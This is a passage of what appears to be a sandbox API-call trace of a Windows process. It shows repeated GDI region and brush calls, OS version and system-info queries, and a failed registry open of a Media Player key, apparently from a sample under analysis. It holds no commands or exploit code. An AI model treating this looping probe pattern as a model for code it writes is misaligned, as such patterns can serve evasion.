hrgnSrc1=0xd00401d9, hrgnSrc2=0xce0401dc, iMode=1) returned 1 [0091.056] CombineRgn (hrgnDst=0x1045a54, hrgnSrc1=0xd00401d9, hrgnSrc2=0xce0401dc, iMode=4) returned 2 [0091.056] CreateSolidBrush (color=0xff) returned 0x2105a52 [0091.056] CreateSolidBrush (color=0xff0000) returned 0x1105a55 [0091.056] DeleteObject (ho=0x1105a55) returned 1 [0091.056] DeleteObject (ho=0xce0401dc) returned 1 [0091.056] DeleteObject (ho=0xd00401d9) returned 1 [0091.056] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.056] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.056] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.056] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.056] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.056] BeginPath (hdc=0x0) returned 0 [0091.056] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.056] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.056] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.056] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.056] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.056] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.056] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.056] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.186] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xcf0401dc [0091.186] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd10401d9 [0091.186] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x2045a57 [0091.186] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x2045a58 [0091.186] CombineRgn (hrgnDst=0x2045a57, hrgnSrc1=0xcf0401dc, hrgnSrc2=0xd10401d9, iMode=1) returned 1 [0091.186] CombineRgn (hrgnDst=0x2045a58, hrgnSrc1=0xcf0401dc, hrgnSrc2=0xd10401d9, iMode=4) returned 2 [0091.186] CreateSolidBrush (color=0xff) returned 0x2105a55 [0091.186] CreateSolidBrush (color=0xff0000) returned 0x2105a56 [0091.186] DeleteObject (ho=0x2105a56) returned 1 [0091.186] DeleteObject (ho=0xd10401d9) returned 1 [0091.186] DeleteObject (ho=0xcf0401dc) returned 1 [0091.186] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.186] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.187] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.187] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.187] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.187] BeginPath (hdc=0x0) returned 0 [0091.187] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.187] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.187] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.187] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.187] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.187] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.187] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.187] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.187] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd20401d9 [0091.187] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd00401dc [0091.187] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a59 [0091.187] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a5a [0091.187] CombineRgn (hrgnDst=0x1045a59, hrgnSrc1=0xd20401d9, hrgnSrc2=0xd00401dc, iMode=1) returned 1 [0091.187] CombineRgn (hrgnDst=0x1045a5a, hrgnSrc1=0xd20401d9, hrgnSrc2=0xd00401dc, iMode=4) returned 2 [0091.187] CreateSolidBrush (color=0xff) returned 0x3105a56 [0091.187] CreateSolidBrush (color=0xff0000) returned 0x1105a5b [0091.187] DeleteObject (ho=0x1105a5b) returned 1 [0091.187] DeleteObject (ho=0xd00401dc) returned 1 [0091.187] DeleteObject (ho=0xd20401d9) returned 1 [0091.187] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.187] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.188] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.188] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.188] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.188] BeginPath (hdc=0x0) returned 0 [0091.188] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.188] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.188] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.188] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.188] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.188] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.188] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.188] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.188] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd10401dc [0091.188] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd30401d9 [0091.188] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a5c [0091.188] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a5d [0091.188] CombineRgn (hrgnDst=0x1045a5c, hrgnSrc1=0xd10401dc, hrgnSrc2=0xd30401d9, iMode=1) returned 1 [0091.188] CombineRgn (hrgnDst=0x1045a5d, hrgnSrc1=0xd10401dc, hrgnSrc2=0xd30401d9, iMode=4) returned 2 [0091.188] CreateSolidBrush (color=0xff) returned 0x2105a5b [0091.188] CreateSolidBrush (color=0xff0000) returned 0x1105a5e [0091.188] DeleteObject (ho=0x1105a5e) returned 1 [0091.188] DeleteObject (ho=0xd30401d9) returned 1 [0091.188] DeleteObject (ho=0xd10401dc) returned 1 [0091.188] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.188] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.188] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.188] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.189] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.189] BeginPath (hdc=0x0) returned 0 [0091.189] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.189] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.189] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.189] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.189] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.189] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.189] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.189] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.189] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd40401d9 [0091.189] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd20401dc [0091.189] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a5f [0091.189] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a60 [0091.189] CombineRgn (hrgnDst=0x1045a5f, hrgnSrc1=0xd40401d9, hrgnSrc2=0xd20401dc, iMode=1) returned 1 [0091.189] CombineRgn (hrgnDst=0x1045a60, hrgnSrc1=0xd40401d9, hrgnSrc2=0xd20401dc, iMode=4) returned 2 [0091.189] CreateSolidBrush (color=0xff) returned 0x2105a5e [0091.189] CreateSolidBrush (color=0xff0000) returned 0x1105a61 [0091.189] DeleteObject (ho=0x1105a61) returned 1 [0091.189] DeleteObject (ho=0xd20401dc) returned 1 [0091.189] DeleteObject (ho=0xd40401d9) returned 1 [0091.189] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.189] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.189] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.189] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.189] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.189] BeginPath (hdc=0x0) returned 0 [0091.189] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.189] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.190] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.190] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.190] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.190] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.190] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.190] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.190] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd30401dc [0091.190] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd50401d9 [0091.190] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a62 [0091.190] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a63 [0091.190] CombineRgn (hrgnDst=0x1045a62, hrgnSrc1=0xd30401dc, hrgnSrc2=0xd50401d9, iMode=1) returned 1 [0091.190] CombineRgn (hrgnDst=0x1045a63, hrgnSrc1=0xd30401dc, hrgnSrc2=0xd50401d9, iMode=4) returned 2 [0091.190] CreateSolidBrush (color=0xff) returned 0x2105a61 [0091.190] CreateSolidBrush (color=0xff0000) returned 0x1105a64 [0091.190] DeleteObject (ho=0x1105a64) returned 1 [0091.190] DeleteObject (ho=0xd50401d9) returned 1 [0091.190] DeleteObject (ho=0xd30401dc) returned 1 [0091.190] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.190] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.190] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.190] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.190] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.190] BeginPath (hdc=0x0) returned 0 [0091.190] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.190] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.190] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.190] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.190] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.190] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.191] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.191] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.191] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd60401d9 [0091.191] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd40401dc [0091.191] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a65 [0091.191] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a66 [0091.191] CombineRgn (hrgnDst=0x1045a65, hrgnSrc1=0xd60401d9, hrgnSrc2=0xd40401dc, iMode=1) returned 1 [0091.191] CombineRgn (hrgnDst=0x1045a66, hrgnSrc1=0xd60401d9, hrgnSrc2=0xd40401dc, iMode=4) returned 2 [0091.191] CreateSolidBrush (color=0xff) returned 0x2105a64 [0091.191] CreateSolidBrush (color=0xff0000) returned 0x1105a67 [0091.191] DeleteObject (ho=0x1105a67) returned 1 [0091.191] DeleteObject (ho=0xd40401dc) returned 1 [0091.191] DeleteObject (ho=0xd60401d9) returned 1 [0091.191] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.191] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.191] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.191] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.191] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.191] BeginPath (hdc=0x0) returned 0 [0091.191] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.191] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.191] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.191] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.191] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.191] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.191] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.191] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.192] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd50401dc [0091.192] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd70401d9 [0091.192] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a68 [0091.192] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a69 [0091.192] CombineRgn (hrgnDst=0x1045a68, hrgnSrc1=0xd50401dc, hrgnSrc2=0xd70401d9, iMode=1) returned 1 [0091.192] CombineRgn (hrgnDst=0x1045a69, hrgnSrc1=0xd50401dc, hrgnSrc2=0xd70401d9, iMode=4) returned 2 [0091.192] CreateSolidBrush (color=0xff) returned 0x2105a67 [0091.192] CreateSolidBrush (color=0xff0000) returned 0x1105a6a [0091.192] DeleteObject (ho=0x1105a6a) returned 1 [0091.192] DeleteObject (ho=0xd70401d9) returned 1 [0091.192] DeleteObject (ho=0xd50401dc) returned 1 [0091.192] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.192] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.192] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.192] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.192] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.192] BeginPath (hdc=0x0) returned 0 [0091.192] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.192] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.192] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.192] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.192] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.192] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.192] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.192] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.193] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd80401d9 [0091.193] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd60401dc [0091.193] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a6b [0091.193] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a6c [0091.193] CombineRgn (hrgnDst=0x1045a6b, hrgnSrc1=0xd80401d9, hrgnSrc2=0xd60401dc, iMode=1) returned 1 [0091.193] CombineRgn (hrgnDst=0x1045a6c, hrgnSrc1=0xd80401d9, hrgnSrc2=0xd60401dc, iMode=4) returned 2 [0091.193] CreateSolidBrush (color=0xff) returned 0x2105a6a [0091.193] CreateSolidBrush (color=0xff0000) returned 0x1105a6d [0091.193] DeleteObject (ho=0x1105a6d) returned 1 [0091.193] DeleteObject (ho=0xd60401dc) returned 1 [0091.193] DeleteObject (ho=0xd80401d9) returned 1 [0091.193] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.193] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.193] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.193] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.193] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.193] BeginPath (hdc=0x0) returned 0 [0091.193] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.193] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.193] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.193] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.193] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.193] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.193] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.193] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.193] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd70401dc [0091.193] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd90401d9 [0091.193] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a6e [0091.193] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a6f [0091.194] CombineRgn (hrgnDst=0x1045a6e, hrgnSrc1=0xd70401dc, hrgnSrc2=0xd90401d9, iMode=1) returned 1 [0091.194] CombineRgn (hrgnDst=0x1045a6f, hrgnSrc1=0xd70401dc, hrgnSrc2=0xd90401d9, iMode=4) returned 2 [0091.194] CreateSolidBrush (color=0xff) returned 0x2105a6d [0091.194] CreateSolidBrush (color=0xff0000) returned 0x1105a70 [0091.194] DeleteObject (ho=0x1105a70) returned 1 [0091.194] DeleteObject (ho=0xd90401d9) returned 1 [0091.194] DeleteObject (ho=0xd70401dc) returned 1 [0091.194] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.194] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: 